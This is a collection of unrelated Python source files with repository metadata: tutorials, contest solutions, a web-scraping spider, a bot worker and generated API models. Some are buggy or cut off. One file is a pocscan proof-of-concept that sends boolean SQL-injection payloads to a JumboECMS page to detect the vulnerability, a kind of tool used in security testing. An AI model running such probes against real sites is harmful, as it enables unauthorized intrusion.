mystr = 'T'
elif type(data) is set:
mystr = 's'
elif type(data) is frozenset:
mystr = 'f'
else:
raise Exception("InternalError: not a known type after checking")
for item in data:
thisitem = serializedata(item)
# Append the length of the item, plus ':', plus the item. 1 -> '2:I1'
mystr = mystr + str(len(thisitem))+":"+thisitem
mystr = mystr + '0:'
return mystr
# dict
elif type(data) is dict:
mystr = 'D'
keysstr = serializedata(data.keys())
# Append the length of the list, plus ':', plus the list.
mystr = mystr + str(len(keysstr))+":"+keysstr
# just plop the values on the end.
valuestr = serializedata(data.values())
mystr = mystr + valuestr
return mystr
# Unknown!!!
else:
raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data))
def deserializedata(datastr):
"""
<Purpose>
Convert a serialized data string back into its original types.
<Arguments>
datastr: the string to deseriailize.
<Exceptions>
ValueError if the string is corrupted
TypeError if the type of 'data' isn't allowed
<Side Effects>
None.
<Returns>
Items of the original type
"""
if type(datastr) != str:
raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'")
typeindicator = datastr[0]
restofstring = datastr[1:]
# this is essentially one huge case statement...
# None
if typeindicator == 'N':
if restofstring != '':
raise ValueError("Malformed None string '"+restofstring+"'")
return None
# Boolean
elif typeindicator == 'B':
if restofstring == 'T':
return True
elif restofstring == 'F':
return False
raise ValueError("Malformed Boolean string '"+restofstring+"'")
# Integer / Long
elif typeindicator == 'I':
try:
return int(restofstring)
except ValueError:
raise ValueError("Malformed Integer string '"+restofstring+"'")
# Float
elif typeindicator == 'F':
try:
return float(restofstring)
except ValueError:
raise ValueError("Malformed Float string '"+restofstring+"'")
# Float
elif typeindicator == 'C':
try:
return complex(restofstring)
except ValueError:
raise ValueError("Malformed Complex string '"+restofstring+"'")
# String
elif typeindicator == 'S':
return restofstring
# List / Tuple / set / frozenset / dict
elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f':
# We'll split this and keep adding items to the list. At the end, we'll
# convert it to the right type
thislist = []
data = restofstring
# We'll use '0:' as our 'end separator'
while data != '0:':
lengthstr, restofdata = data.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
thisitemdata = restofdata[:length]
thisitem = deserializedata(thisitemdata)
thislist.append(thisitem)
# Now toss away the part we parsed.
data = restofdata[length:]
if typeindicator == 'L':
return thislist
elif typeindicator == 'T':
return tuple(thislist)
elif typeindicator == 's':
return set(thislist)
elif typeindicator == 'f':
return frozenset(thislist)
else:
raise Exception("InternalError: not a known type after checking")
elif typeindicator == 'D':
lengthstr, restofdata = restofstring.split(':', 1)
length = int(lengthstr)
# get this item, convert to a string, append to the list.
keysdata = restofdata[:length]
keys = deserializedata(keysdata)
# The rest should be the values list.
values = deserializedata(restofdata[length:])
if type(keys) != list or type(values) != list or len(keys) != len(values):
raise ValueError("Malformed Dict string '"+restofstring+"'")
thisdict = {}
for position in xrange(len(keys)):
thisdict[keys[position]] = values[position]
return thisdict
# Unknown!!!
else:
raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
80475aeee17df3cba099d4d162c7d768068d604d
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/cms/jumboecms/jumboecms_slide_id_sqli.py
|
2b692758481ff7bb88275db2b44434dd22f770e3
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105
| 2019-01-29T09:31:31
| 2019-01-29T09:31:31
| 168,127,418
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,432
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: JumboECMS V1.6.1 注入漏洞
referer: http://www.wooyun.org/bugs/wooyun-2010-062717
author: Lucifer
description: 文件/plus/slide.aspx参数id存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class jumboecms_slide_id_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
trueurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=1"
falseurl = self.url + "/plus/slide.aspx?id=1%20AnD%201=2"
try:
req1 = requests.get(trueurl, headers=headers, timeout=10, verify=False)
req2 = requests.get(falseurl, headers=headers, timeout=10, verify=False)
if r"Stack trace" not in req1.text and r"Stack trace" in req2.text:
cprint("[+]存在JumboECMS V1.6.1 注入漏洞...(高危)\tpayload: "+falseurl, "red")
else:
cprint("[-]不存在jumboecms_slide_id_sqli漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = jumboecms_slide_id_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"wangxinyu@vackbot.com"
] |
wangxinyu@vackbot.com
|
fff42786877735c43c12c0b6b7b613c376845e8c
|
6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d
|
/exc7_more_print.py
|
9a734f30db2a725ccfb434e3859ea93eda66107f
|
[] |
no_license
|
yaowenqiang/lpthw
|
b65e6b8ce576e7caa5cfba5570550e546d1e0549
|
4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5
|
refs/heads/master
| 2020-04-01T10:57:32.959389
| 2019-05-01T09:27:25
| 2019-05-01T09:27:25
| 153,140,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
print("Mary had a little lamb.")
print("Its fleece was white as {}.".format("snow"))
print("And everywhere that Mary went.")
print("." * 10)
end1 = "c"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "b"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
print(end1 + end2 + end3 + end4 + end5 + end6, end=" ")
print(end7 + end8 + end9 + end10 + end11 + end12)
|
[
"yaowenqiang111@163.com"
] |
yaowenqiang111@163.com
|
c0bca8d865bf372c3ad7e16a347e11b50c5bd363
|
6a7058009587e78b5c758ff783410325ad7c2a4b
|
/leet/trees/serializeDeserialize.py
|
11901325add1a326d48e38679f57ee4d830890e5
|
[
"Apache-2.0"
] |
permissive
|
stacykutyepov/python-cp-cheatsheet
|
8b96b76403c501f5579befd07b3c4a4c69fe914e
|
a00a57e1b36433648d1cace331e15ff276cef189
|
refs/heads/master
| 2023-07-16T13:26:35.130763
| 2021-08-30T11:23:39
| 2021-08-30T11:23:39
| 401,442,535
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,345
|
py
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
rtn = []
def dfs(node):
if node:
rtn.append(str(node.val))
dfs(node.left)
dfs(node.right)
else:
rtn.append('#')
dfs(root)
return ' '.join(rtn)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def dfs():
val = next(vals)
if val == '#':
return None
else:
node = TreeNode(int(val))
node.left = dfs()
node.right = dfs()
return node
vals = iter(data.split())
return dfs()
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
['1', '3', '5', '#', '6', '#', '#', '2', '#', '4', '#', '#']
|
[
"peterrlamar@gmail.com"
] |
peterrlamar@gmail.com
|
ae112f60c472608d64fea6061820870ce341dd5c
|
048df2b4dc5ad153a36afad33831017800b9b9c7
|
/atcoder/arc030/arc030_2.py
|
fb80908cb169ecdb2886d69d72282652698d8452
|
[] |
no_license
|
fluffyowl/past-submissions
|
a73e8f5157c647634668c200cd977f4428c6ac7d
|
24706da1f79e5595b2f9f2583c736135ea055eb7
|
refs/heads/master
| 2022-02-21T06:32:43.156817
| 2019-09-16T00:17:50
| 2019-09-16T00:17:50
| 71,639,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,146
|
py
|
def reduce_graph(root, children, houseki):
def rec_dfs(node):
removals = []
for c in children[node]:
if not rec_dfs(c):
removals.append(c)
for i in removals[::-1]:
children[node].remove(i)
if len(children[node]) == 0 and houseki[node] == 0:
return False
else:
return True
rec_dfs(root)
return children
def solve():
n, root = map(int, raw_input().split())
root -= 1
rinsetsu = [[] for i in range(n)]
houseki = map(int, raw_input().split())
for i in range(n-1):
x, y = map(lambda x:int(x)-1, raw_input().split())
rinsetsu[x].append(y)
rinsetsu[y].append(x)
children = [[] for i in range(n)]
stack = [(root, None)]
while len(stack) != 0:
node, parent = stack.pop()
for child in rinsetsu[node]:
if child != parent:
children[node].append(child)
stack.append((child, node))
children = reduce_graph(root, children, houseki)
s = 0
for i in range(n):
s += len(children[i]) * 2
print s
solve()
|
[
"nebukuro09@gmail.com"
] |
nebukuro09@gmail.com
|
71724e17def474442e5c246dd126c278d482fb73
|
74482894c61156c13902044b4d39917df8ed9551
|
/test/test_get_contract_details_by_address_response_item.py
|
924e6c10948054f2f336b69dea39bc685b9e522f
|
[
"MIT"
] |
permissive
|
xan187/Crypto_APIs_2.0_SDK_Python
|
bb8898556ba014cc7a4dd31b10e24bec23b74a19
|
a56c75df54ef037b39be1315ed6e54de35bed55b
|
refs/heads/main
| 2023-06-22T15:45:08.273635
| 2021-07-21T03:41:05
| 2021-07-21T03:41:05
| 387,982,780
| 1
| 0
|
NOASSERTION
| 2021-07-21T03:35:29
| 2021-07-21T03:35:29
| null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
"""
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import cryptoapis
from cryptoapis.model.get_contract_details_by_address_response_item import GetContractDetailsByAddressResponseItem
class TestGetContractDetailsByAddressResponseItem(unittest.TestCase):
"""GetContractDetailsByAddressResponseItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetContractDetailsByAddressResponseItem(self):
"""Test GetContractDetailsByAddressResponseItem"""
# FIXME: construct object with mandatory attributes with example values
# model = GetContractDetailsByAddressResponseItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"kristiyan.ivanov@menasoftware.com"
] |
kristiyan.ivanov@menasoftware.com
|
3a48961a4b6dd2e091a6c553297caabc8dfe0bf9
|
8501165bbbc6acf017b062c846a3ef7ef8624dc0
|
/dataframes.py
|
5e95c158a85cf9e26deb466f6ef7e8a54bd9025e
|
[] |
no_license
|
olavosamp/spark_tutorial
|
df9edcc3cf82fc2103dd4f889e13eec22f97fbcc
|
c80d0e8259eda0dc443c3af259a3b11241ba63fa
|
refs/heads/master
| 2023-03-29T09:20:08.279790
| 2021-03-26T20:01:40
| 2021-03-26T20:01:40
| 351,897,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, StringType, IntegerType
spark = SparkSession.builder.master("local[1]").appName("SparkbyExamples.com").getOrCreate()
data = [
("George", "M", 12),
("Adolf","M", 14),
("Emilia","F", 16),
]
print("\nOriginal RDD")
rdd = spark.sparkContext.parallelize(data)
print(rdd)
print("RDD Count ", rdd.count())
print("\nDataFrame from RDD")
df_rdd = rdd.toDF()
df_rdd.show()
print("\nDataFrame from list")
columns = ["Name", "Sex", "Age"]
df_list = spark.createDataFrame(data=data, schema=columns)
df_list.show()
print(df_list.head())
print("\nDataFrame with Schema")
schema = StructType([
StructField("Name", StringType(), False),
StructField("Sex", StringType(), True),
StructField("Age", IntegerType(), True),
])
df_schema = spark.createDataFrame(data=data, schema=schema)
df_schema.printSchema()
df_schema.show(truncate=False)
exit()
print("\nDataFrame from csv")
df_csv = spark.read.csv("test.csv", header=True)
df_csv.printSchema()
df_csv.show()
df_csv.createOrReplaceTempView("PERSON_DATA")
df_sql = spark.sql("SELECT * FROM PERSON_DATA")
df_sql.show()
df_groupby = spark.sql("SELECT Sex, COUNT(*) FROM PERSON_DATA GROUP BY Sex")
df_groupby.show()
|
[
"olavosamp@poli.ufrj.br"
] |
olavosamp@poli.ufrj.br
|
ef0aaacd8fedf13c8a18d46944b7df0927c88d38
|
e905abd9bb7bd7017657d0a0c4d724d16e37044c
|
/.history/article/spiders/ieee_20210206223025.py
|
4220b80e3f61daeddb62f3b9b60b2bc1a791ce13
|
[] |
no_license
|
tabdelbari/articles
|
a8b921841f84fb473f5ed1cdcda743863e6bc246
|
f0e1dfdc9e818e43095933139b6379a232647898
|
refs/heads/main
| 2023-03-05T10:21:35.565767
| 2021-02-10T13:35:14
| 2021-02-10T13:35:14
| 325,654,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,534
|
py
|
import scrapy
import logging
import re
from scrapy_splash import SplashRequest, request
from article.items import ArticleItem
import json
class IeeeSpider(scrapy.Spider):
name = 'ieee'
allowed_domains = ['ieee.org']
lua_script = """
function main(splash, args)
assert(splash:go{
splash.args.url,
headers=splash.args.headers,
http_method=splash.args.http_method,
body=splash.args.body,
})
assert(splash:wait(10))
return splash:html()
end
"""
def __init__(self, topic='', keywords='', **kwargs):
super().__init__(**kwargs)
# self.start_urls = ['https://ieeexplore.ieee.org/search/searchresult.jsp?newsearch=true&queryText=%s' %keywords]
self.post_url = 'https://ieeexplore.ieee.org/rest/search'
self.headers = {
'Origin': 'https://ieeexplore.ieee.org',
'Host': 'ieeexplore.ieee.org',
'Accept-Language': 'fr-MA,fr;q=0.9,en-US;q=0.8,en;q=0.7,ar-MA;q=0.6,ar;q=0.5,fr-FR;q=0.4',
'Accept-Encoding': 'gzip, deflate, br',
'Accept': 'application/json',
'Content-Type': 'application/json'
}
self.topic = topic
self.keywords = keywords
self.totalPages = 0
def start_requests(self):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"]}'
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': 'hello'},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
def init_articles(self, response):
# response.meta['data'] -> "hello"
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
self.totalPages = jr['totalPages']
for i in range(1, (self.totalPages+1)):
post_data = '{"queryText": "' + self.topic + \
'", "highlight": true, "returnType": "SEARCH", "matchPubs": true, "rowsPerPage": 100, "returnFacets": ["ALL"], "pageNumber": '+str(i)+'}'
yield SplashRequest(self.post_url, self.parse_1, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': i},
args={'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data, 'headers': self.headers})
pass
def parse_1(self, response):
logging.info('##################################Processing:' + str(response.meta['data']))
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic
}
# search for country
yield SplashRequest(self.post_url, self.init_articles, endpoint='execute',
magic_response=True, meta={'handle_httpstatus_all': True, 'data': result},
args={'lua_source': self.lua_script, 'http_method': 'GET', 'body': null, 'headers': self.headers})
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
def parse(self, response):
jr = json.loads(response.xpath('//*/pre/text()').get(default=''))
for record in jr['records']:
result = {
'title': record['articleTitle'],
'authors': '|'.join(list(map(lambda author: author['preferredName'], record['authors']))),
'country': '',
'abstract': record['abstract'],
'date_pub': record['publicationDate'],
'journal': record['publicationTitle'],
'topic': self.topic,
'latitude': '',
'longitude': ''
}
# search for country
yield request
# find abstract for this article and pass as meta the half of object: record['articleNumber']
pass
|
[
"abdelbari1996@hotmail.com"
] |
abdelbari1996@hotmail.com
|
3cd9bfc221cf246f3a393362774ee3f9883a9923
|
288a00d2ab34cba6c389b8c2444455aee55a8a95
|
/tests/data23/recipe-496895.py
|
705c281fd7ebdc79fa6b70e2cc5c4d5bbf46119c
|
[
"BSD-2-Clause"
] |
permissive
|
JohannesBuchner/pystrict3
|
ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb
|
18b0dd369082422f9bf0f89c72e7acb53a49849c
|
refs/heads/master
| 2023-08-14T06:37:37.954880
| 2023-07-13T11:16:38
| 2023-07-13T11:16:38
| 268,571,175
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
import string
def rebase(i, frombase=None, tobase=None, fromalphabet=None, toalphabet=None, resize=1, too_big=40000, debug=False):
''' if frombase is not specified, it is guessed from the type and/or char in i with highest ord.
tobase defaults to [10, 2][frombase == 10].
the alphabets are map(chr, range(256)) if its base is between 62 and 255;
otherwise, string.digits+string.letters.
always returns a string which is also valid input.
valid bases are ints in range(-256, 257).
alphabets must be subscriptable, and can only contain str's.
invalid tobases are replied with 'why?'; rebase('why?') == '217648673'.
returned string is zfilled to the next largest multiple of resize
'''
if frombase == None:
if isinstance(i, int):
frombase = 10
elif isinstance(i, str):
a = str(i)
if any([(chr(x) in a) for x in list(range(ord('0'))) + list(range(58, 65)) + list(range(91, 97)) + list(range(123, 256))]):
frombase = max(list(map(ord, a))) + 1
else:
frombase = max(list(map((string.digits + string.letters).index, a))) + 1
if tobase == None:
tobase = [10, 2][frombase == 10]
# got bases, ensuring that everything is an int
tobase = int(tobase)
frombase = int(frombase)
abstobase = abs(tobase)
absfrombase = abs(frombase)
if absfrombase in [0, 1]:
i = len(str(i))
elif 2 <= frombase <= 36:
# may be difficult to translate to C
i = int(str(i), frombase)
else:
i = str(i)
n = 0
if fromalphabet == None:
if 62 <= absfrombase <= 256:
fromalphabet = list(map(chr, list(range(256))))
else:
fromalphabet = string.digits + string.letters
fromalphabet = fromalphabet[:absfrombase]
for j in range(len(i)):
n += (frombase ** j) * fromalphabet.index(i[-1-j])
i = n
# got ints, converting to tobase
if debug: print('converting %d from base %d to %d' % (i, frombase, tobase))
if abstobase in [0, 1]:
return '0' * ((i > 0) and int(i) or 0)
elif abstobase > 256:
return 'why?'
# if execution gets here, we might want the result to be zfilled to a multiple of resize
r = ''
if tobase == 10:
r = str(i)
else:
if i < 0:
print('negative', end=' ')
i = -i
if toalphabet is None:
if 62 <= abstobase <= 256:
toalphabet = list(map(chr, list(range(abstobase))))
else:
toalphabet = (string.digits + string.letters)[:abstobase]
if tobase < 0:
i = -i
j = 0
while i != 0:
r = toalphabet[i % tobase] + r
i /= tobase
j += 1
if j >= too_big: raise "call again; set too_big bigger"
if resize > 1:
if 62 <= abstobase <= 256:
r = toalphabet[0] * (resize - (len(r) % resize)) + r
else:
r = r.zfill(len(r) + resize - (len(r) % resize))
return r
|
[
"johannes.buchner.acad@gmx.com"
] |
johannes.buchner.acad@gmx.com
|
e54a39dbfad7a724eeeaa1ef31bddec82f0bd60a
|
b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23
|
/Problem Solving/Algorithms/Strings/Strong Password/Strong_Password.py
|
ffab59cbf509d72ada08350dae73075e23cc95ca
|
[] |
no_license
|
rsoemardja/HackerRank
|
ac257a66c3649534197b223b8ab55011d84fb9e1
|
97d28d648a85a16fbe6a5d6ae72ff6503a063ffc
|
refs/heads/master
| 2022-04-14T22:46:03.412359
| 2020-04-03T07:44:04
| 2020-04-03T07:44:04
| 217,687,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 758
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the minimumNumber function below.
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
count = 0
if any(i.isdigit() for i in password)==False:
count+=1
if any(i.islower() for i in password)==False:
count+=1
if any(i.isupper() for i in password)==False:
count+=1
if any(i in '!@#$%^&*()-+' for i in password)==False:
count+=1
return max(count,6-n)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
password = input()
answer = minimumNumber(n, password)
fptr.write(str(answer) + '\n')
fptr.close()
|
[
"rsoemardja@gmail.com"
] |
rsoemardja@gmail.com
|
0250af5de2c470cdfe5b35e79ad11ff9fecf0505
|
b3aa3d77836fa8f05b54d68e7bd6bff19dced90d
|
/Atcoder/166/F.py
|
cebe95a2befd384d575177108224c95f438c7ef8
|
[] |
no_license
|
anoubhav/Codeforces-Atcoder-Codechef-solutions
|
660c5b78723791bc33b1d51977bf11ebe6dfe4c1
|
aeebcae332af64aba49f52261d11aa6996f33b1c
|
refs/heads/master
| 2022-12-08T14:02:49.574928
| 2020-08-29T14:18:30
| 2020-08-29T14:18:30
| 255,004,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 878
|
py
|
n, a, b, c = list(map(int, input().split()))
slist = []
d = {'A': a, 'B':b, 'C':c}
soln = []
prev = None
for i in range(n):
s = input()
# corner case
if prev:
if prev[0] in s:
d[prev[0]] += 1
d[prev[1]] -= 1
soln.append(prev[0])
else:
d[prev[1]] += 1
d[prev[0]] -= 1
soln.append(prev[1])
prev = None
# corner case
if d[s[0]] ==1 and d[s[1]] == 1:
prev = s
# greedy
elif d[s[0]] >= d[s[1]]:
d[s[0]] -= 1
d[s[1]] += 1
soln.append(s[1])
elif d[s[0]] < d[s[1]]:
d[s[1]] -= 1
d[s[0]] += 1
soln.append(s[0])
if d['A'] < 0 or d['B'] < 0 or d['C'] < 0:
print('No')
exit()
break
print('Yes')
print('\n'.join(soln))
|
[
"anoubhav.agarwaal@gmail.com"
] |
anoubhav.agarwaal@gmail.com
|
3bc0fa150804ea42ba257f13005f8613c6d86e46
|
d3dc206446cffc919a7b3fb0838ca0ef14043e04
|
/redditbot/worker.py
|
3af98330efac68cb5f8d935bf1d5e72af2b2adfd
|
[] |
no_license
|
gtmanfred/redditbot
|
70ff2e2d1a63a4d272db93301ebb4f21acf16dae
|
05d8f24620c9a3847c7e0c37ae8015e048af312e
|
refs/heads/master
| 2020-04-18T14:56:02.289674
| 2015-10-19T01:22:40
| 2015-10-19T01:22:40
| 42,025,013
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
from kombu.connection import BrokerConnection
from kombu.mixins import ConsumerMixin
from blinker import signal
import logging
from redditbot.queues import task_queues
logger = logging.getLogger(__name__)
class Worker(ConsumerMixin):
def __init__(self, connection, config):
self.connection = BrokerConnection(connection)
self.config = config
def get_consumers(self, Consumer, channel):
return [Consumer(queues=task_queues,
accept=['pickle', 'json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
post = body['post']
logger.info('Got task: %s', post.id)
try:
logger.info(
'New Post for %s: %s',
post.subreddit.display_name, str(post)
)
for channel in \
self.config['subreddits'][post.subreddit.display_name]:
signal('send-message').send(channel, message=post)
message.ack()
except Exception as exc:
logger.error('Exception Raised: %r', exc)
|
[
"danielwallace@gtmanfred.com"
] |
danielwallace@gtmanfred.com
|
1287031215a5c2e62234091f3722019c1952123e
|
3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d
|
/第三阶段笔记/x.py
|
9a4ea86bafae287fe00bb41414f17d9df388718a
|
[] |
no_license
|
qianpeng-shen/Study_notes
|
6f77f21a53266476c3c81c9cf4762b2efbf821fa
|
28fb9a1434899efc2d817ae47e94c31e40723d9c
|
refs/heads/master
| 2021-08-16T19:12:57.926127
| 2021-07-06T03:22:05
| 2021-07-06T03:22:05
| 181,856,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,542
|
py
|
import time
HTML_ROOT_DIR="./static"
PYTHON_DIR="./wsgiPy"
class Application(object):
def __init__(self,urls):
self.urls=urls
def __call__(self,env,set_headers):
path=env.get('PARH_INFO','/')
if path.startswith('static'):
file_name=path[7:]
try:
fd=open(HTML_ROOT_DIR,'rb')
except IOError:
status='404 not fount'
headers=[]
set_headers(status,headers)
return "<h1>===没找到===<h1>"
else:
file_data=fd.read()
fd.close()
status='200 OK'
headers=[]
set_headers(status,headers)
return file_data.decode('utf-8')
else:
for url,handler in self.urls:
if path==url:
return handler(env,set_headers)
status="404 not found"
headers=[]
set_headers(status,headers)
return "sorry url not found"
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
urls=[
('/time',show_time),
('/hello',say_hello),
('/bye',say_bye),
("/xiaoyang",yang)
]
app=Application(urls)
|
[
"shenqianpeng@chengfayun.com"
] |
shenqianpeng@chengfayun.com
|
09dc93bf160fae79ae292d82e8e5f44287276cfe
|
70bee1e4e770398ae7ad9323bd9ea06f279e2796
|
/openapi_client/models/waas_path.py
|
628e708d4edce2b96dbb415798f282ec876d858b
|
[] |
no_license
|
hi-artem/twistlock-py
|
c84b420b1e582b3c4cf3631eb72dac6d659d4746
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
refs/heads/main
| 2023-07-18T07:57:57.705014
| 2021-08-22T04:36:33
| 2021-08-22T04:36:33
| 398,637,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,597
|
py
|
# coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasPath(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'methods': 'list[WaasMethod]',
'path': 'str'
}
attribute_map = {
'methods': 'methods',
'path': 'path'
}
def __init__(self, methods=None, path=None, local_vars_configuration=None): # noqa: E501
"""WaasPath - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._methods = None
self._path = None
self.discriminator = None
if methods is not None:
self.methods = methods
if path is not None:
self.path = path
@property
def methods(self):
"""Gets the methods of this WaasPath. # noqa: E501
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:return: The methods of this WaasPath. # noqa: E501
:rtype: list[WaasMethod]
"""
return self._methods
@methods.setter
def methods(self, methods):
"""Sets the methods of this WaasPath.
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:param methods: The methods of this WaasPath. # noqa: E501
:type methods: list[WaasMethod]
"""
self._methods = methods
@property
def path(self):
"""Gets the path of this WaasPath. # noqa: E501
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:return: The path of this WaasPath. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this WaasPath.
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:param path: The path of this WaasPath. # noqa: E501
:type path: str
"""
self._path = path
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WaasPath):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, WaasPath):
return True
return self.to_dict() != other.to_dict()
|
[
"aakatev@virtru.com"
] |
aakatev@virtru.com
|
a536bdcbf7d2e262cdcd57fb7576a6c706c7c063
|
fcbf910c46991955159a11a34573d3bbb2c8bb90
|
/test/serial/mf_mapping.py
|
fa9f5612f9e55757f82782376fecec5ea9607cbd
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
xunzhang/paracel
|
59114aa63e46b844e56e1089dae633e55150875a
|
553598a1f4c942c80157adfc23c2cd3fe0dab333
|
refs/heads/develop
| 2020-05-19T08:57:50.643425
| 2015-06-14T16:44:49
| 2015-06-14T16:44:49
| 14,230,290
| 13
| 3
| null | 2014-12-09T16:24:44
| 2013-11-08T10:37:14
|
C++
|
UTF-8
|
Python
| false
| false
| 3,221
|
py
|
#! /usr/bin/env python
#
# Matrix factorization with bias
#
import numpy as np
class mf():
